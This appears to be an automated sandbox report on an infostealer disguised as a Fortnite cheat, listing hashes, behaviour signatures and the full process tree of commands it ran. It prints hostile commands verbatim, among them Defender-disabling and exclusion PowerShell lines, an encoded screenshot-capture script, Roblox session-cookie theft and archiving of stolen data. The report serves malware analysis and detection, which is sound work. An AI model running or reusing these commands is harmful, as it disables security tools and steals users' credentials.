Resubmissions

13/12/2024, 22:16 UTC

241213-169yws1qcn 10

13/12/2024, 22:14 UTC

241213-15v4cazlgz 10

Analysis

  • max time kernel
    6s
  • max time network
    13s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-fr
  • resource tags

    arch:x64arch:x86image:win11-20241007-frlocale:fr-fros:windows11-21h2-x64systemwindows
  • submitted
    13/12/2024, 22:16 UTC

General

  • Target

    cheat fortnite.exe

  • Size

    6.9MB

  • MD5

    c8241ffaa3c1e6eb10192424e8d2dabb

  • SHA1

    dcf25b0a0b3f1ec681ff71a25d2c9dc0f119dd1d

  • SHA256

    973dc4caf0232f42a06efd4a8695dbb89b3fc8dc974d59cc6cdea34e49967094

  • SHA512

    1b0ba7b8534c214d3ae914d41680f373aa2687c3a8f6bc32dc87aee1164cff151a4ac14aa72a109c30ad5ffd64c11aab90496368be6bb664c56161625fe6b08a

  • SSDEEP

    98304:+SDjWM8JEE1FZqh4KBamaHl3Ne4i3Tf2PkOpfW9hZMMoVmkzhxIdfXeRpYRJJcGK:+S0HBeNTfm/pf+xk4dWRpmrbW3jmre

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 41 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cheat fortnite.exe
    "C:\Users\Admin\AppData\Local\Temp\cheat fortnite.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4932
    • C:\Users\Admin\AppData\Local\Temp\cheat fortnite.exe
      "C:\Users\Admin\AppData\Local\Temp\cheat fortnite.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4660
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cheat fortnite.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4272
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cheat fortnite.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2232
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:668
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1316
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('lancer', 0, 'REUSSI', 32+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3612
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('lancer', 0, 'REUSSI', 32+16);close()"
          4⤵
            PID:1524
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2040
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:4736
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2552
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1468
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3240
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
            4⤵
              PID:4456
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4056
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              4⤵
                PID:836
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1492
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                • Suspicious use of AdjustPrivilegeToken
                PID:3120
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4380
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                PID:4016
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\cheat fortnite.exe""
              3⤵
              • Hide Artifacts: Hidden Files and Directories
              • Suspicious use of WriteProcessMemory
              PID:3392
              • C:\Windows\system32\attrib.exe
                attrib +h +s "C:\Users\Admin\AppData\Local\Temp\cheat fortnite.exe"
                4⤵
                • Views/modifies file attributes
                PID:5000
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‎  .scr'"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2316
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‎  .scr'
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:1084
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1140
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:3340
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:5008
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:1048
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1992
              • C:\Windows\System32\Wbem\WMIC.exe
                WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                4⤵
                  PID:4964
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                3⤵
                • Clipboard Data
                PID:4604
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Get-Clipboard
                  4⤵
                  • Clipboard Data
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4972
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                3⤵
                  PID:2172
                  • C:\Windows\system32\tasklist.exe
                    tasklist /FO LIST
                    4⤵
                    • Enumerates processes with tasklist
                    PID:3568
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:1420
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:2980
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                      3⤵
                      • System Network Configuration Discovery: Wi-Fi Discovery
                      PID:636
                      • C:\Windows\system32\netsh.exe
                        netsh wlan show profile
                        4⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:1092
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "systeminfo"
                      3⤵
                        PID:2800
                        • C:\Windows\system32\systeminfo.exe
                          systeminfo
                          4⤵
                          • Gathers system information
                          PID:1224
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                        3⤵
                          PID:3360
                          • C:\Windows\system32\reg.exe
                            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                            4⤵
                              PID:1284
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                            3⤵
                              PID:4708
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                4⤵
                                  PID:3580
                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\atswanws\atswanws.cmdline"
                                    5⤵
                                      PID:3128
                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9E24.tmp" "c:\Users\Admin\AppData\Local\Temp\atswanws\CSC3D68562E08F4C0EA65EFF2C01D5DCC.TMP"
                                        6⤵
                                          PID:1112
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    3⤵
                                      PID:4812
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        4⤵
                                          PID:2976
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                        3⤵
                                          PID:3804
                                          • C:\Windows\system32\attrib.exe
                                            attrib -r C:\Windows\System32\drivers\etc\hosts
                                            4⤵
                                            • Views/modifies file attributes
                                            PID:5032
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          3⤵
                                            PID:2612
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              4⤵
                                                PID:3456
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                              3⤵
                                                PID:680
                                                • C:\Windows\system32\attrib.exe
                                                  attrib +r C:\Windows\System32\drivers\etc\hosts
                                                  4⤵
                                                  • Views/modifies file attributes
                                                  PID:1368
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                3⤵
                                                  PID:1272
                                                  • C:\Windows\system32\tree.com
                                                    tree /A /F
                                                    4⤵
                                                      PID:4772
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                    3⤵
                                                      PID:2700
                                                      • C:\Windows\system32\tasklist.exe
                                                        tasklist /FO LIST
                                                        4⤵
                                                        • Enumerates processes with tasklist
                                                        PID:412
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      3⤵
                                                        PID:1220
                                                        • C:\Windows\system32\tree.com
                                                          tree /A /F
                                                          4⤵
                                                            PID:1704
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                          3⤵
                                                            PID:828
                                                            • C:\Windows\system32\tree.com
                                                              tree /A /F
                                                              4⤵
                                                                PID:4876
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "getmac"
                                                              3⤵
                                                                PID:4828
                                                                • C:\Windows\System32\Conhost.exe
                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  4⤵
                                                                    PID:4964
                                                                  • C:\Windows\system32\getmac.exe
                                                                    getmac
                                                                    4⤵
                                                                      PID:752
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                    3⤵
                                                                      PID:3424
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                        4⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        PID:2796
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                      3⤵
                                                                        PID:2892
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                          4⤵
                                                                            PID:2356
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI49322\rar.exe a -r -hp"mateo" "C:\Users\Admin\AppData\Local\Temp\uRd0S.zip" *"
                                                                          3⤵
                                                                            PID:4488
                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI49322\rar.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\_MEI49322\rar.exe a -r -hp"mateo" "C:\Users\Admin\AppData\Local\Temp\uRd0S.zip" *
                                                                              4⤵
                                                                                PID:5036

